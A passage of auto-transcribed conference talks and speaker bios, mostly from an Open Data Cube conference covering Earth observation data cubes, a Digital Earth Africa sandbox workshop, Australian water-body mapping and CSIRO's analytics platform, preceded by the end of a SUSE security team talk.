textual form and later on in a XML form. We also do cryptographic certifications. Just recently the NIST, also another US government body, released the FIPS 140-3 standard, basically describing crypto parameters that your cryptographic system has to fulfill. And also we plan to work on a common-quarantia certification, which we did for the last enterprise servers. We also plan to do that for the enterprise server 15. The common-quarantia certification describes the whole development process and the product that comes out of it. So how are we publicly visible, accepting of course the service we provide to open zoos. What we do benefits all the upstream open source projects. They get more secure, so even other vendors benefit from our work. We are recently participating in the Nürnberg IT security meetup called 0911.org. And we are hosting every second instance at our offices. And we are presenting occasionally at conferences like this or other security conferences. We are planning on extending our presence more as we are growing. Currently it's not that much, but we are trying to improve on that. So that's it from my side. Good on our landing page and our main contact address where you can address security questions here and that we are looking for some good engineers. Any questions? So I will be hanging around here if you have questions later on. And thank you for listening.
Another year - another security retrospective. The talk will introduce the SUSE security team and its members, our areas of work and responsibilities. The talk will show some statistics and interesting details of last year security issues, and go in detail on some of the specific codenamed ones. A special focus will be on updated classification and overview of last years Meltdown and Spectre like CPU issues, describing them and the mitigations that SUSE has been deployed. As the SUSE security team has grown in the last year, we also increased our work in both proactive security and related areas, which the talk will briefly highlight.
10.5446/54371 (DOI)
Welcome to the keynote session EO at the Edge. I'm Brian Killow from NASA and I lead the SEOS Systems Engineering Office. I'll be facilitating this session, so let's jump in. Our session theme EO at the Edge will explore how Earth observation data is being used in new and innovative ways and what we see for the future. I'll kick off this session with a short presentation. Followed by five other presentations from our guest speakers. And then we will end with a 45 minute panel discussion. I thought I would share some news and innovations from the SEOS world. A few things that we have accomplished recently and many of you may not know what's happening. There's a number of regional cubes that are in discussion and development. Many of you know of the SEOS world. Digital Earth Africa, but we're also working in the Americas, Digital Earth Americas, and in the Pacific Islands, Digital Earth Pacific. And you see our icons over there to the right and all of these things are coming along quite nicely with our aim of someday having regional data cubes around the world. There's also been a lot of progress in analysis ready data. There's a SEOS analysis ready data for land specification called CARDFAREL that you may have heard about. And we have had a number of new specifications that are in development such as aquatic reflectance, night light radiance, and interferometric and polarimetric radar as well as LiDAR. It's our hope that many of these specifications will come together and be approved within the year. And we will have quite an extensive list of CARDFAREL specs. There's also a number of new cloud providers that are hosting SEOS data sets. Most recently Microsoft, Acer, Cloud, and the planetary computer they're coming on board with many of the same large data sets that we're used to using and you're going to probably hear more from them in the near future. I always get a number of unexpected inquiries about the open data cube. And I just wanted to let all of you know what some of these inquiries are, where they're coming from, because I really always find them quite interesting. I've had a number from student researchers that just asked to use open data cube for their research or their projects. I was contacted by the Norwegian Computing Center. Also there's a Ernst & Young EY Student Challenge that is happening in Australia and I've been partnering with Geoscience Australia to help them move that forward. Being contacted by the German Aerospace Center, just a few weeks ago there was contacted by a group called Air Center in the Azores and they are producing an Azores data cube. Geo IM map is working in the Middle East. The UN World Food Program has contacted us directly about Digital Earth Pacific and then most recently just this past week I was involved in a conference called Earth Archive, which is an attempt to create a digital elevation model three-dimensional digital elevation model of the Earth, what they call a digital twin, and storing that data in voxel maps, which are basically three-dimensional pixels. And then finally I wanted to mention that we've developed a new open data cube sandbox that utilizes Google Colab and Google Earth Engine and I'll tell you a bit more about that on the next chart. We're really excited about the new open data cube sandbox. You can find the link there, openearthalliance.org to go check it out on your own. It runs on Google Colab. So it's free and open notebook interface. It connects to Google Earth Engine datasets and we've indexed a number of the big datasets like Landsat Sentinel-1, Sentinel-2. And you can create sample application products and run them anywhere in the world without the need to download data. The key to this is that it's free, it's open, and you can run immediately Jupyter notebooks. Now there is one catch and that is you need a Google account. So if you just have a Google Gmail address, that's perfectly fine. And then you need Earth Engine authorization. So if you go to the sandbox link, you will see information on how to apply for Earth Engine authorization. It's a rather simple step and sometimes it just takes a matter of minutes or an hour or sometimes a day or two depending upon the email address you use. This Google Colab environment is small. It includes about 12 gigabytes of RAM and about 100 gig of storage. So when you spin it up and initialize it, it gives you your own dedicated instance. And you can do a number of analyses there and demonstrate notebooks. It's really fantastic for the potential for training and capacity building. But if you want to run larger analyses and you want to scale this up, you're going to have to move it to Google Cloud to take advantage of the Earth Engine datasets. So what we've done is we've created a number of sample applications or sample notebooks that we have ready to run for users. So we have cloud statistics for Landsat 8 and Sentinel 2. It basically looks at a stack of scenes and you can go through those scenes and get cloud statistics and look at the images. Spectral products, you can create cloud filtered mosaics and even download and save the mosaic locally. Vegetation change water extent using the WAFSA algorithm from Australia vegetation phenology, nighttime lights using the VIRS instrument, mission coincidences which is real interesting and that is when does Landsat 8 Sentinel 1 or Sentinel 2 crossover simultaneously in any location. And then finally we have a notebook dedicated to Sentinel 1 radar products. So all of these run on this platform that is managed by Google and CoLab is the environment that runs the Jupyter notebook. So it's really fantastic. I urge you all to go check it out and we'll be making some updates in the next week or two because we'll be demoing this for the upcoming Geo meeting. So finally I wanted to end with a few thoughts on what we see for the future. Certainly more regional and local data cubes around the world. They seem to be popping up all of the time. Certainly when I say local I probably mean more country level data cubes and then I told you a bit earlier about the regional initiatives. In general I'm seeing broad open data cube adoption by governments and commercial entities around the world. I think it's fantastic that the efforts of this open data cube community have benefited so many people in having more efficient and effective access to data. And so along those lines faster and more efficient applications we're noticing that a lot of our notebooks are using Dask now, we're using parallel processing and machine learning. I think all of these ideas for our applications are going to be more popular. Python proficiency is also increasing around the globe. I just personally completed a Python class in this past week so that I could become a bit better with my skills. And we're managing a few training sessions within the SEOS world through the working group on capacity building to do a large scale training event for Python. So it's really exciting to see that more people are stepping up to learning how to use this and it makes the ability to run our notebooks and use our satellite data so much easier. The standardization of metadata and stack format is something I believe is taking hold and it's going to ultimately eliminate the need for ODC indexing if we can get everything to be into stack metadata format. I'm also seeing a number of diverse data sets that want to have the ability to utilize Open DataCube framework. There's some work going on with drones, analytical mechanics and the group I work with here has been piloting some drone data integrated with Open DataCube. I'm working with the VoxelMap people on the Earth Archive project for 3D Voxels and then of course there's Internet of Things which would give us the ability to take data from small devices and store that in Open DataCube frameworks. And then finally interoperable analyses that use multiple and diverse data sets. There's not many of those things happening but I believe that is also the way of the future is bringing together all of these diverse data sets for the objective of a given output product and that's where the power of some of the computing and some of the interesting concepts will come together. So thank you for that brief introduction. As always please check out the Open DataCube website. We have a Twitter account and if you want to see more about the Google Sandbox that I discussed go to openearthalliance.org slash sandbox. Thank you.
Dr. Brian Killough has 34 years of NASA experience and leads the Committee on Earth Observing Satellites (CEOS) Systems Engineering Office. The SEO supports the international CEOS organization coordinating satellite earth observation data for global benefit. Dr. Killough has played a significant role in the evolution of the Open Data Cube initiative and the development of several country-level and regional data cube initiatives. Dr. Killough received his BS degree from the University of Virginia, his MS degree from George Washington University and his PhD from the College of William and Mary.
10.5446/54372 (DOI)
Thank you so much for joining. We might give it a few minutes just to make sure everybody's online but I'm really happy to see all of you so far. I hope you were either able to attend the session already or that you're planning to attend some upcoming sessions if they're in a better time zone for you. I certainly know it's a bit earlier in the day on the other side of the world from Australia where I am. So I appreciate you all coming along. So yeah, I'll give it another like minute or two but then we'll get started. If you're keen to chat or feel like you want to introduce yourself feel free to put in the chat who you are and where you're joining us from. I'd love to see the different diversity and global representation that we've got going on. Thanks Alex for starting off the chat. Thank you. That's wonderful. We've got people from all over the world. I'm so excited. It's my absolute pleasure to be running this session with you and my hope is that at the end of the session you'll be a little bit more familiar with doing some programming with an open data cube implementation specifically for Digital Earth Africa. So we seem to be doing pretty well for people in which case I might get started. So I'm going to share my screen and just present a few slides to sort of introduce you to the workshop and a little bit of background. So thank you so much for coming along. It's really great that you're here, that you're participating in the conference and that you've taken this opportunity to get to learn a little bit more about how we can, you know, how you could use the open data cube to analyze satellite imagery. We're going to specifically be working with one of our open sandbox platforms. I did send around an email earlier if you had pre-registered for this session with some instructions for signing up but if you haven't yet don't worry at all we'll cover that as part of the 30 minute session that you have for working in a small group. So for this particular tutorial I'm just going to give you a little bit of background. I'm going to do a live demonstration of how to load. We're going to have 30 minutes to work through a tutorial again which I sent around earlier but again I will share with you when we get there. So if you're new to the open data cube I wanted to start by talking about the fact that it's a piece of open source software that's there to help you catalog and query specifically raster data. So images that come out of satellites it's really great for that. And what it really is doing is that it's providing a method for you to say here's where my data is located and here's how it's sort of sorted in time and here's where it is on my file system. And then what that means is that you can query that database to just pull out the pixels and the imagery that you actually need and want to analyze and that's what the open data cube enables you to do. So this is sort of well explained by these components so we have the open data cube as a whole but it's sort of split into you know where the data is sitting and those are the actual you know let's say geotiff files. Then there's the infrastructure which is what's interfacing between the data and also the applications which is how you're going to access the data. So when we set up open data cubes we have to build this index database that says here's where all my data lives either it lives in the cloud on s3 or it might live on your native file system. And once you've done that indexing you can then use these sort of various apps like Jupiter notebooks or web services to go and access the data that you need. But the indexing is pretty hard and so what we're going to do today is we're going to use an implementation of the open data cube that already has that index set up specifically over all of Africa. And for this implementation we're going to use Jupiter notebooks so this is an environment where you can write Python code section by section and see your results as you go. So I'm going to show you a little bit of what that looks like. Like I said doing the index is the hard part of the open data cube and the reason these sandboxes are great we not only have one for Digital Earth Africa but one for Digital Earth Australia as well is that the data is already there and you can just work straight with the open data cube like an API to work with the data. The other thing that's great about the sandboxes that you might notice in the picture is they actually come with a whole bunch of reference notebooks such as the beginner's guide that you can use to learn about how to actually achieve certain things in the open data cube such as loading data or plotting it. So the goals for this workshop you're going to find an area that looks interesting to you somewhere in Africa. Load a little bit of data for it we won't load too much just because you only have a little bit of time and sometimes the loading can take a while and then see if you can visualize it using the sort of standard RGB red green blue imagery plot. If you are feeling ambitious there's a scratch goal where you can take this data and calculate a satellite imagery band index so this might be something like the normalised difference vegetation index which might tell you about the health of different fields, yeah the different crops in these fields. So I'm going to jump in now to doing a live demonstration. So here's the digital Africa sandbox I've already logged in. You can see here's these existing folders that are really useful and this is how we create a new notebook. So I'm going to rename my notebook and call it ODC workshop. So the great thing is is that this sandbox is your space when you leave and log back in anything you put in here is unique to you. You have a copy of all these standard notebooks but you can copy them and edit them as you desire and just make your own notebooks. So now that we've got this I'm actually going to need to pick an area that we want to start with. So one of the easiest ways to do this is the digital earth Africa maps interface and the reason I really like this is that you get a really clear visual of the whole continent and you can sort of easily look about where look where data is available and get the information that you're going to need in order to load it in your data cube. So one of the nice features I think is that you can directly search. So this is pullback carer. I've zoomed in a little bit at the moment this is just a sort of background imagery setting but once that loads in I'm going to be able to use this as a sort of guide to find something interesting that I want to look at. So here I'm going to look at these irrigated fields. Okay so the thing I can do now that's really helpful is that by clicking somewhere on the map I can actually get some latitude and longitude coordinates and these are what I'm going to have to use to load my data. So what I'm actually going to do is I'm going to copy those and in my notebook I'm going to change this this is called a cell I'm going to change it to mark down and this means I'll plain text here that I can get back to later. If I press shift enter that actually just renders this plain text so this is really good for keeping notes of things I'm going to need. So I'm actually going to make a note that when I did that click I was sort of in the bottom left corner of where I want to look so I'm going to say bottom left are these coordinates. Perfect so I can get rid of that and now I can click up here so that's going to be the top right again I'm just going to copy those coordinates and pop them into here so that is the top right. Awesome and I do want to mention that I as part of that PDF that you'll work through for most of the session I have instructions for you to follow for all of these steps so there's no need to follow along live with me as I do this feel free to just pay attention and understand the different components that are involved in actually going and loading loading data. So now that I know whereabouts I want to load some data I'm just going to put a break in there so I can see them a bit more clearly. I can come back to my map and start exploring what data digital earth Africa has available so there's a big explore map data button here and everything's nicely cataloged so I'm going to look in satellite images I want to look at surface reflectance so that's what our earth looks like and again this is analysis ready data so it's going to be straight ready for us to work with so I want to have a look at sort of changes on the order of months so I'm going to go for the daily surface reflectance data rather than looking at the annual. I'm also going to add I'm going to look at Sentinel-2 specifically because it's got that higher resolution and sort of faster revisit time so when I click that product in the DE Africa maps interface I get this really good sort of detailed information about the product this is really worth reading if you're not familiar with these products but right at the bottom there's a piece of information I really need for the sandbox and this is this what's called the layer name so I'm going to copy that here it says s2 underscore l2a and that stands for Sentinel-2 level 2a so that's the analysis ready data so I'm going to come back to my notebook and double clicking that cell to edit it and I'm just going to make a note that says Sentinel 2 product name is this oh um you can directly add that data to the map um and there's another good feature that will let you specifically filter by location because Sentinel-2 specifically passes over different parts of Africa each day you won't always see satellite imagery in the location that you're looking at every day however if I change it to filter by location you can really see the real imagery that was captured on these days so that can be a really nice heads up of you know are you looking at the data you actually want to analyze so for me I'm pretty happy with this so now I can actually get started so now that I have this information that I'm going to need one of the best things you can do to help yourself is to go and look at the beginner's guide and look through the different notebooks we have for doing things so I'm going to open the loading data um notebook as a reference for myself just going to close this a little bit um I love Jupiter Lab because I can just stick this notebook over here as a reference and I can keep working in my own notebook so these notebooks have lots and lots of detail um and they're really great as a reference guide so one of the first things you can see is that when we're working with the open data cube you need to import the open data cube um Python package so that's going to give you access to all the API and you need to set up um an object that's actually your connection to the to the digital earth Africa data cube so I'm going to start by import data cube and you can see some of the color has come up because I'm actually working in a code cell so when I press shift enter that's all good um this one on the side here means that that's finished running and then in order to connect to the data cube I'm going to call my data cube object DC and the way that you call it is you write data cube dot data cube so that's the data cube object from the data cube library um we tend to give it an app name and that's just to help us understand um all the different people that are using the data cube but really we can call it anything so I'm going to call it my notebook and then that's enough to connect it this uh deprecation warning is coming up but it's um not something we need to be worried about so sometimes when things come up in red they might just be a warning it's always worth having a read of them okay so I'm now looking at how the load data using DC load specifically it will require at a minimum a product so this is actually our Sentinel to level 2a product um it requires the area I want to load um my sort of uh x dimension the area I want to load the y dimension um and the time span over which I want to load it and it tells you a little bit about how you need to provide the format there so what I'm going to do is before I actually construct that load I'm going to turn the data I collected into something that's a little bit more useful so something that's great that I can do in python is I can actually set up variables that mean something to me so what I'm doing here is I'm typing bottom and left so these are two variables and here I'm going to just copy the latitude and longitude values that I collected earlier so I know that that one is the bottom because it corresponds to degrees north and I know that this one is the left because it's degrees east and what that will do is when I evaluate that cell this will say bottom is equal to 30.2 and left is equal to 30.5 obviously with the extra Gaussian points so I can do this again for the top and the right equals and then again I'm going to use a bracket this is called a tuple in python um and I'm going to copy and paste my coordinates straight in there okay so I'm going to say that my data product is equal to s2 underscore l2a I'm using quotes here because I need to pass this in as a string so a word rather than a number and finally the thing I hadn't decided is that I need to pick a start and an end date so I'm going to call a new variable start date it's equal to I'm going to look at 2020 and January and January first again you pass this in as a string and you can see that that information is available in the loading data book. I'm just going to load two months worth of data just because I don't want us to be here too long and Sentinel 2 is data every three to five days so two months should give me a reasonable amount of data to look at. So when I press shift enter these variables are all assigned if I type one of them and hit shift enter you can see that python will print out for me the value that's actually assigned to that so that's a good way to check if things are working the way you expect I'm just going to cut that settle because I don't need it anymore. Fantastic now we can start learning how to load data so this is an example for the geomedium Sentinel 2 product I'm going to use that as a basis and I'm going to add a couple of other things that have to do with loading Sentinel 2 so I'll need to assign my loaded data to a variable so I'm going to call that ds that stands for data set you could really call this anything you could say Sentinel 2 you could say you know March data set or anything you want to call it is fine we tend to use ds and ds with underscores to kind of indicate that they're a data set so here I'm using this dc object that we did earlier that's my data cube and I'm asking it to load so from here I'm going to start inputting the information I need so there's an argument called product and I'm going to say that that's equal to my variable data product which is the Sentinel level 2a then I'm going to say that my x is equal to left comma right and my y is equal to it doesn't really matter I don't think whether you go top or bottom or bottom or top but I'm going to go top and bottom and then finally I'm going to also put in time equals start date and date you could also copy you know these numbers and these strings straight into here like they are in in this example I like using variables because you could come and edit this later if you wanted to change them another thing you'll see here is you need to specify which measurements you want these are the sort of satellite imagery bands so measurements equals and for that we provide python lists so that's with the square brackets so we use blue green right I'm also going to load near input red so that's nir finally there's a little extra bit that's required um if I actually try and run this it will give me an error and that's because this product doesn't actually have a default coordinate reference system so it's telling me I have to specify the output CRS and the resolution as a part of my query so I'm going to come back up to my query and just add another line so here's the output CRS I'm going to use EPSG 6933 for Sentinel 2 that's going to give me something back in meters and then it also said I needed to specify the resolution so in this case what I'm going to write is negative 10 comma 10 and what's that saying is that each pixel is 10 meters and it's just providing the information that the y pixels go down in space rather than from left to right and they go top to bottom instead of bottom to top which is something it needs so there is some more information about that in this document if you want to look at it so see how this has a little asterisk that means it's loading which is good it does take a few seconds just double checking I didn't accidentally load a huge amount of data but it's done which is great so when I showed you before that you can just type in a variable and see what it looks like we can do the same thing with our loaded data set and what we actually get is something for the x array data set so what this tells you is that the data I've loaded actually has three dimensions I've got 24 times steps 656 x pixels and 414 y pixels and it tells me that my so I could just look at one of those directly if I type the s dot red and again that's showing me the actual surface reflectance values that are sitting in there so that's the introduction so far I would highly recommend that you also have a look at the plotting notebooks and the basic analysis notebooks if you are working through the pdf we supplied to you in the breakout rooms so I'm going to stop sharing for the moment and now it is your turn so what's going to happen now is for the next half an hour you're going to be assigned for a breakout room either with me or Andrew Hicks or Ife Chong or Alex Leif and we'll be there to answer your questions if you get stuck working through the tutorial so the link to the tutorial I'm going to post it in the chat here but each of your facilitators can post it to you again if you don't have it so yeah so please feel free to just open the pdf and start working through it your facilitators are there if you have questions or you want to know how to do something different and after half an hour we'll all come back in here just to wrap up I hope you enjoy the workshop and get to learn some things about loading and manipulating data so Roshni if you can open the breakout rooms that'd be great you might see your screen disappear as Roshni does this but it will come back in a moment when you're loaded into the breakout room so have a great time thanks
This workshop is designed to provide an introduction and demonstration of how to load data and manipulate it in the Digital Earth Africa Sandbox environment. We'll use this environment as there is no installation required and data is already available. The workshop is designed for people who are new to programming or new to ODC. Please see the accompanying documentation for this workshop to follow through here: https://gist.github.com/caitlinadams/93eccb5bddef8423459ea74498db6d62
10.5446/54373 (DOI)
Thank you very much for the opportunity to present today. I'm going to show you some of the great work that we're doing in Digital Earth Australia, making use of the open data cube to answer questions, particularly around water across the Australian landscape. So we've got petabytes of satellite information across Australia and what we've done with our open data cube instance in Digital Earth Australia is fill it with analysis ready data. So analysis ready data is a really important concept for what we've been able to do with Digital Earth Australia because it means that all of the satellite imagery is pre-processed. All of the imagery has been ortho rectified, so all of the kind of wiggles of the direction of the capture have been sorted out, it's been calibrated and it's been turned into a time series so that we can look at every individual pixel and know that we can analyse them through time and the imagery has been corrected enabling us to do that using the open data cube technology. So we have petabytes of data across all of Australia going back since 1987, every 16 days or so and there's literally infinite ways that we can analyse that information and so our job here is to turn that data into something that's actually useful and what you see in the background here is a bit of a buff of imagery that has been produced various ways that you can actually go about visualising the information, making use of the open data cube so that we can pre-process and automate the processing of those data sets. So the really big question becomes not so much of what can we do but why, what are we actually wanting to find out, what are the big questions that we're trying to answer and so I'm just going to walk you through just a couple of case studies that go through some of those questions that we've been able to answer making use of open data cube technology. So the first question that we were asked by some of our stakeholders was okay you've got access to this satellite archive, can you use it to tell us where water bodies are across particularly the Murray Darling Basin and how the water in them is changing over time. So this was a question posed by a stakeholder wanting to make use of satellite imagery to supplement the information that they already had in this area. So for those of you not in Australia the Murray Darling Basin is a very large inland catchment, it covers a huge portion of the continent so if you can imagine the size of Australia we're looking at something about a fifth of the size of the continent and we have huge amount of agricultural production in this area so it's a really important area to be able to understand. It's also out quite remote so there's the settlements throughout but there are big areas where there's really not a lot of people going out there regularly so making use of satellite information to understand what's happening in these areas is a really important opportunity. So we have a product that we've produced called Water Observations from Space and what it does is it takes the complete archive of satellite imagery and compresses it down into a layer that basically tells you how frequently water is observed in every pixel across the entire Australian continent. So I've taken a small snapshot of that archive here and what you get is this beautiful image of a lake system in kind of the arid northern part of Australia and the colours that you're seeing here will tell you how frequently water is observed. So where you can see red colours, yellow colours, we're seeing water in only about sort of one to five percent of total observations. Through the green spectrum into the blue colours we're starting to see water occur more frequently and what this allows us to do is build up a really clear picture of how water is moving through the landscape, how frequently we can expect it in different locations. And this is a really valuable data set but we want to be able to look at a lake. Pixels are really useful for being able to do individual kind of small scale analyses but we don't really care about how all of the individual pixels in the lake are doing, we actually want to look at the lake as a whole. So we've developed a product that turns that raster data set into a vector data set which basically means we've just taken it, drawn a big line around it and looked at them as a series of objects. So rather than a hundred pixels that make up a lake, you now have one lake object. And across Australia we were able to do this using Python scripts and the open data cube so that we can automate the detection of those lake systems and we mapped about 300,000 water bodies across the entire continent using that methodology. For every single one of those water bodies we've been looked at the individual satellite observations that have been collected for each water body and looked at how the surface area of water inside of those individual objects has changed over time. So here as an example we've got a pretend lake in our red box and in our first time step with satellites passed overhead and we can see that it's all blue. So we're seeing water across the entire surface area of that lake. Time B we're looking at about a 40% coverage of water and C only a 5%. And if you take those 300,000 water bodies and you do this for every single one of them for every single satellite observation, what you get back is a really rich time history of how each individual water body has changed over time. And here's just one example of that. This is a lake system just outside of Canberra where we are. And you can see that we've made this information publicly available. It's in a website. You can go into that website and you can access this information, click on any water body and you get back on the bottom is a time history of that changing percentage of surface area. So this product was developed based off the requirements of a stakeholder and making use of the kind of tool set that comes with the open data cube. So we're also able to answer other questions. One of the other questions we have addressed or started to address is particularly in that part of Australia, we have a lot of very dry locations and we have people grazing stock out there. And so we've made use of this information to answer the question, how much surface water is available for stock? And every single month we produce a map like this with our collaborators in the New South Wales state government. And what it does is it takes the latest satellite observations across the state and it tells you how much water compared to how much water could be there if every single one of those water bodies was completely covered in water. How much water is there actually now? And this has been a really powerful tool to help agricultural managers understand the availability of surface water across the state. And the final case study I wanted to share was, okay, so we know that we can map water, we can do that in a reasonably quick time frame. What about for a place for a use case where we really need to have information fast? So if you're a firefighter and a fire has just broken out, can we tell you where the closest open water is to that fire ground? So this is some prototyping work that we're doing at the moment or in the process of producing an operational system that does this. But in this map you can see the red, yellow and orange are hot spots. So they're areas that have been detected as enormously warm. And in this location it corresponds to a fire. The red ones are the most recent observations through to yellow, the oldest. And what we've done here is just intersect this information with the water bodies data set so that we can get an understanding of the water bodies that have observed water in them in the last 30 days within a certain distance of the fire ground. And in reality what that actually looks like is something like this. We've got some flight paths added into our map in the background. And what you can see is the type of the water bodies that these particular aircraft have gone to to collect water to fight in this fire ground. So this is a really important piece of information because not only do they need to know that there is water available there, they also need to know the characteristics of that water. Because if you've got a helicopter, you can get water from a swimming pool. But if you've got a fixed wing aircraft that you're using as a water fighting tool, you need to know that the water bodies of a certain size so that the plane has time to get in and get out again. So we're working with stakeholders to answer all sorts of questions across Australia and I've just chucked a bunch of them in here. And basically the key takeaway message is that we have so much information that's been available across Australia because of the richness of the Landsat archive that we have and the Sentinel now that that's being collected as well. And so the big thing that we have to do is speak with our stakeholders and understand what questions is that they want to actually answer using the data and how we can go about supporting that. And we've really been able to provide some new insights that have allowed for enhanced decision making capability using subtle ad information that wouldn't have been available if it wasn't for the ability to do those bulk large scale processing using the open data cube technologies. So thank you very much.
Claire Krause is the Assistant Director of Product Development in Digital Earth Australia; Geoscience Australia’s satellite imagery program. She is responsible for working with stakeholders to develop ideas and workflows for using our wealth of satellite information to better inform decision makers on Australia’s natural resources, with a particular focus on water.
10.5446/54376 (DOI)
Hi, I'm Dr. Robert Woodcock and it's great to be with you today at the Open Data Cube Conference. I'd like to give you a bit of an overview of the impact the Open Data Cube has had at the CSIRO and with our many clients and collaborators in our work in the Earth observation. We'll begin by having a look at the Earth Analytics at CSIRO and the diversity of use cases and technologies that are involved and also our Earth Analytics Science Innovation Hub and how we're using that and the Open Data Cube within it to really accelerate how we take our research outcomes and make them available to industry and government globally. Then we'll look specifically at the contributions that we make to the Open Data Cube community and we hope you're enjoying some of those and consider some of those in your future work. A brief overview of the easy data pipelines and also a look at really just how this is actually playing out for us with both our research and our public good deployments and also our commercial enterprise deployments and engagement we have using the Open Data Cube. So Earth observation at CSIRO is a big area. We have a few hundred researchers working in Earth observation or related fields. We not only do satellite data from the public data sets that you see globally like Sentinel and Landsat but we also make very heavy use of high resolution data acquired from satellites and also from airborne and UAV type data sets. We combine that also with field work. So we have sensors like a Hydrospector which is used for in situ sensors on ground for aquatic reflections and so forth and we combine those data sets together into our analytics codes to provide some of the best of breed water quality type algorithms, agricultural work. We have researchers in oceans, atmosphere, minerals and mining areas, urban researchers and so forth. So it's quite a broad area and creating an analytics platform that's capable of handling all of those is actually quite challenging given the variety of data and the variety of research that's being performed. As a result we have a system which we call EASY or the Earth Analytics Science and Innovation Hub. The core analytics are powered by Open Data Cube of course. That's one aspect of it that's very important for Earth observation work. We also make very good use of the Pangeo area or work which is primarily around climate and oceans type modeling type work. We have machine learning capabilities in the system and really just drawing on the Python scientific data ecosystem quite broadly. We use this environment EASY for really accelerating the transfer of the research outcomes that we're producing into use by large to small, medium enterprises, government and research organizations on a global scale. As a result we have EASY deployments in a number of regions around the world. Australia of course, the United States, Chile, Southeast Asia and we are providing EASY as a deployment option as a shared tendency for commercial subscribers and we have a couple of those as well as an enterprise secure environment for organizations that want their own system integrated fully within their enterprise. This type of engagement is enabling us to use EASY as a platform to conduct research with those organizations and then transfer that research outcome directly into use by that organization. The EASY itself as I mentioned is an ecosystem. It's not just Open Data Cube, it's a wide variety of systems across the Python tool suite. It has as a result a range of interfaces and the point I wanted to make with this range of interfaces is it is very common for our work to begin at the exploratory phase and Jupyter Labs and direct Python coding using things like Visual Studio Code which is also available through the EASY interfaces. Using that direct coding interface to do that iterative analysis in an environment that we know can be deployed and used directly with our clients begins at that exploratory data analytics. It starts there, you can pick it up and then put it into a web application for on-the-fly creation of a product or in a scalar production workflow for automated update. You can do the experiment and then you can transfer it to print production and the code is staying relatively the same all the way through and that's really the power that we're getting from the EASY system. So the capabilities of EASY mentioned Open Data Cube, clearly a part of it. Analysis ready data is clearly also very important. We apply this not only to Earth observation data but also data coming from things like our Hydrospectros sensor for field measurements and in situ measurements and having that flow into the system. Our users have in this environment their own space as well as shared project spaces. This is all handled and authenticated under attribute-based access control within the system which is a key enterprise feature for the EASY system. We also have users have their own customizable DAS clusters, plural. Users can actually have their own DAS clusters, multiple of them and they can scale those up and down as required for their particular research workflow that they're undertaking. The actual platform will scale to thousands of cores. It may scale even higher. That's kind of the limit we've got to at the moment in terms of demand and we perform multi-sensor data integration very routinely and so there is a variety of data more than just Earth observation in the system. The actual system itself is a Kubernetes cluster running on AWS. It's all managed through DevOps controls, tools like HashiCook Terraform and Flux and this has been a very important part of that automation of deployment. Without that, I doubt very much we could actually run this system. There are many thousands of moving parts across the multiple deployments. Sira itself contributes to the ODC in a number of areas. In particular, we're interested in things like the ZAR driver for Open DataCube. That ZAR driver adds multi-dimensional support. For us, it's particularly important for handling hyperspectral satellite data which is coming, starting to be an increasing part of our work. We also have extensions for supporting LiDAR data from Jedi and a number of other satellites as part of our work and coming through and we'll be contributing those components back into the Open DataCube community as they come on board. We're also core contributors to the Kubernetes and Terraform environment and feel free to reach out to us for assistance and advice in that area if you're interested in setting up our production Open DataCube that scales. We also play a role in coordinating with the International Space Agencies, USGS Landsat, analysis ready data from Copernicus, etc. It doesn't happen without influence and both GS Science Australia and CSIRO contribute directly into the Committee on Earth Observation Satellites Leadership roles, coordinating activities in ensuring that information systems and services across all the CS agencies are making more and more of the data available on the cloud and in a now-assisted ready form for you to use. Another area we contribute is, of course, in science and applications outside of DataCube Core, some of the notebooks that you see kicking around in the Open DataCube community have had contributions from CSIRO and we work very closely with GA on a number of products as well. So all of this work on the Open DataCube has had and the Earth Analytics Science Innovation Hub has had a tremendous impact on our research. We have several hundred users within CSIRO and a few dozen projects actually operating on easy as a routine matter now and that's in a pre-production phase. We're actually working with our corporate Enterprise IT Group now to get it into a fully production environment with single sign-on across the whole of CSIRO at the moment and we've also deployed this, as I mentioned, into multiple regions around the world and we have commercial subscribers. So at the moment we're actually running seven production environments of easy across the planet with a very wide variety of data types coming through our data pipelines capability and more are coming online as we speak. We're looking to add a lot more work around the enterprise features, particularly fine-grained access control on resources and control on billing and cost controls within the system itself. And we're also looking for a way to encourage the creation of going from a notebook to a dashboard and so with that I'd like to say thank you very much for your time today and I hope this has been a useful overview. If you'd like further information feel free to contact any of the members of our team and thank you again and I hope you enjoy the rest of the Open DataCube conference.
Dr Robert Woodcock is a Research Scientist and Consultant in Earth Data and Analytics infrastructures with CSIRO Minerals and CSIRO Space and Astronomy. Data and its conversion to useful, decision supporting information is a universal need for business, community, and Government across a broad range of areas from improving business operations through application in decision support at a national and international levels in earth resource, urban and environmental management. As our ability to gather data has grown exponentially, so has our need to manage the flow of information within and between organisations and to make it useful. Dr Woodcock and his teams have address the issues of information flow across organisational boundaries and have developed innovative information systems adopted into national infrastructure and achieved lasting large scale economic impact on multiple organisations. Dr Woodcock's portfolio of activities involves national spatial data infrastructure and CSIRO Earth Analytics Science Innovation Cloud platform. His team’s portfolio has seen national application in Australian Industry and Government including the AuScope national geoscience information infrastructure. Internationally, he is a member of the Committee on Earth Observation Satellites (CEOS) and Chair for the CEOS Working Group on Information Systems and Services. Robert has worked for almost two decades in the field of visualisation, spatial information systems and analytics and its application to Earth Science with a focus on ensuring research innovation leads to business innovation.
10.5446/54382 (DOI)
Hi everyone, my name is Caitlin Adams and it's my pleasure to be speaking to you today on behalf of the Open Data Cube Steering Council. I'm going to be telling you a little bit about what we do as a council and what we've got planned for the next, our next sort of projects. So I wanted to talk about the fact that the council exists to ensure the long-term well-being of the Open Data Cube project and that's both in terms of the technology but also the broader community that makes that technology possible. We run monthly meetings where we discuss things like code architecture, event planning such as this conference and how we can be better supporting the community to do the development that makes the Open Data Cube such a great piece of open source software. If you as a part of your organisation have been contributing to the Open Data Cube for a year, you can actually have a representative on the Steering Council. So if that's something you're interested in, feel free to talk to me or our previous Chair Alex Leith or our upcoming Chair which I'll announce at the end. If you want to learn more about the governance, you can see that on our GitHub. So for most of this talk, I want to cover some of the highlights we've had from the past year. So in terms of being an open source project, the Open Data Cube was recently awarded a status of becoming an OSGO community project and that's really important because it recognises the work that's been put into this project and helps us promote it. This was a process that was led by Alex Leith who was our previous Chair of the Steering Council and we'd really like to thank Bruce Bannerman and Joanie Garnett for their support and part of this process. We are looking to continue this work to go to a full OSGO project status and that involves a full code licence audit. So something I think that's been really cool in the past 12 months is how the Open Data Cube has progressed to allow the creation of continental scale products. So there are two tools that we use for doing this. One is Alchemist and one is Statistician. So the way that Statistician works is that it's there to summarise huge quantities of Earth observation data. So a really good example is the Digital Earth Africa geomad product which condenses two petabytes of data into 